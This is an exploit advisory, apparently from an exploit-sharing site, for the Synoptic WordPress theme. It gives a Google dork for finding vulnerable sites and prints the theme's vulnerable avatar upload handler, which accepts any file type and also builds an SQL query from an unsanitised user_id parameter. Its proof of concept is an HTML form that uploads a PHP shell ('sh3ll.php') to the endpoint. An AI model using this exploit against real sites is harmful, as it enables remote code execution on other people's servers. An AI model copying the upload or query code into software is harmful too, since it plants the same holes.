Wordpress Themes Synoptic Shell Upload Vulnerabilities
#- Title: Wordpress Themes Synoptic Shell Upload Vulnerabilities
#- Author: uknown
#- Date: 11/08/2015
#- Developer : RecarnTheme
#- Vendor : themeforest
#- Link Download : themeforest. net/item/synoptic-premium-wordpress-template/234600
#- Google Dork: inurl:wp-content/ themes/synoptic/
#- Tested on : Windows 7
#- Fixed in ??
=====================================================
&- Vulnerability : /public_html/wp-content/themes/synoptic/lib/avatarupload /upload.php
bug code :
<?php
//include required wp-load.php file for access WP functions
$wp_load_include = "../wp-load.php";
$i = 0;
while (!file_exists($wp_load_include) && $i++ < 9) {
$wp_load_include = "../$wp_load_include";
}
//required to include wordpress file
require($wp_load_include);
/**
* Handle file uploads via XMLHttpRequest
*/
class qqUploadedFileXhr {
/**
* Save the file to the specified path
* @return boolean TRUE on success
*/
function save($path) {
$input = fopen("php://input", "r");
$temp = tmpfile();
$realSize = stream_copy_to_stream($input, $temp);
fclose($input);
if ($realSize != $this->getSize()){
return false;
}
$target = fopen($path, "w");
fseek($temp, 0, SEEK_SET);
stream_copy_to_stream($temp, $target);
fclose($target);
return true;
}
function getName() {
return $_GET['qqfile'];
}
function getSize() {
if (isset($_SERVER["CONTENT_LENGTH"])){
return (int)$_SERVER["CONTENT_LENGTH"];
} else {
throw new Exception('Getting content length is not supported.');
}
}
}
/**
* Handle file uploads via regular form post (uses the $_FILES array)
*/
class qqUploadedFileForm {
/**
* Save the file to the specified path
* @return boolean TRUE on success
*/
function save($path) {
if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){
return false;
}
return true;
}
function getName() {
return $_FILES['qqfile']['name'];
}
function getSize() {
return $_FILES['qqfile']['size'];
}
}
class qqFileUploader {
private $allowedExtensions = array();
private $sizeLimit = 10485760;
private $file;
function __construct(array $allowedExtensions = array(), $sizeLimit = 10485760){
$allowedExtensions = array_map("strtolower", $allowedExtensions);
$this->allowedExtensions = $allowedExtensions;
$this->sizeLimit = $sizeLimit;
$this->checkServerSettings();
if (isset($_GET['qqfile'])) {
$this->file = new qqUploadedFileXhr();
} elseif (isset($_FILES['qqfile'])) {
$this->file = new qqUploadedFileForm();
} else {
$this->file = false;
}
}
private function checkServerSettings(){
$postSize = $this->toBytes(ini_get('post_max_size'));
$uploadSize = $this->toBytes(ini_get('upload_max_filesize'));
if ($postSize < $this->sizeLimit || $uploadSize < $this->sizeLimit){
$size = max(1, $this->sizeLimit / 1024 / 1024) . 'M';
//die("{'error':'increase post_max_size and upload_max_filesize to $size'}");
}
}
private function toBytes($str){
$val = trim($str);
$last = strtolower($str[strlen($str)-1]);
switch($last) {
case 'g': $val *= 1024;
case 'm': $val *= 1024;
case 'k': $val *= 1024;
}
return $val;
}
/**
* Returns array('success'=>true) or array('error'=>'error message')
*/
function handleUpload($uploadDirectory, $replaceOldFile = TRUE){
if (!is_writable($uploadDirectory)){
return array('error' => "Server error. Upload directory isn't writable.");
}
if (!$this->file){
return array('error' => 'No files were uploaded.');
}
$size = $this->file->getSize();
if ($size == 0) {
return array('error' => 'File is empty');
}
if ($size > $this->sizeLimit) {
return array('error' => 'File is too large');
}
$pathinfo = pathinfo($this->file->getName());
//$filename = $pathinfo['filename'];
$filename = $this->file->getName();//$pathinfo['filename'];
//$filename = md5(uniqid());
$ext = $pathinfo['extension'];
if($this->allowedExtensions && !in_array(strtolower($ext), $this->allowedExtensions)){
$these = implode(', ', $this->allowedExtensions);
return array('error' => 'File has an invalid extension, it should be one of '. $these . '.');
}
if(!$replaceOldFile){
/// don't overwrite previous files that were uploaded
while (file_exists($uploadDirectory . $filename . '.' . $ext)) {
$filename .= '_1';//rand(10, 99);
}
}
//if ($this->file->save($uploadDirectory . $filename . '.' . $ext)){
if ($this->file->save($uploadDirectory . $filename)){
global $wpdb;
$table_name = $wpdb->prefix.'syn_users';
/*$syn_posts_query = "UPDATE ".$table_name." SET market_file_name='".$filename . '.' . $ext."'
WHERE ID = ".$_GET['user_id']." AND post_status='publish';"; // update user profile info*/
//$syn_avatar_query = "UPDATE ".$table_name." SET user_avatar = '".$filename.".".$ext."' WHERE ID = ".$_GET['user_id'].";"; // update user profile avatar
$syn_avatar_query = "UPDATE ".$table_name." SET user_avatar = '".$filename."' WHERE ID = ".$_GET['user_id'].";"; // update user profile avatar
//$wpdb->show_errors();
$wpdb->query($syn_avatar_query);
//return array('success'=>true);
} else {
return array('error'=> 'Could not save uploaded file.' .
'The upload was cancelled, or server error encountered');
}
}
}
// list of valid extensions, ex. array("jpeg", "xml", "bmp")
$allowedExtensions = array();
// max file size in bytes
$sizeLimit = 1 * 528 * 528; // is equal with 278KB
$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
//put permission to upload file
$stat = @stat( dirname( AVATAR_UPLOAD_FOLDER ) );
$dir_perms = $stat['mode'] & 0007777; // Get the permission bits.
@chmod( AVATAR_UPLOAD_FOLDER, $dir_perms );
$result = $uploader->handleUpload(AVATAR_UPLOAD_FOLDER);
//put permission to not read folder from outside
$dir_perms = $stat['mode'] & 0005555; // Get the permission bits.
@chmod( AVATAR_UPLOAD_FOLDER, $dir_perms );
// to pass data through iframe you will need to encode all html tags
echo htmlspecialchars(json_encode($result), ENT_NOQUOTES);
?>
&- When Vulnerable : {"error":"No files were uploaded."}
Proof Of Concept :
Material : sh3ll.php
Code:
<form enctype="multipart/form-data"
action="url.com/wp-content/themes/synoptic/lib/avatarupload/upload.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="3xploi7ed !" />
</form>
Post a Comment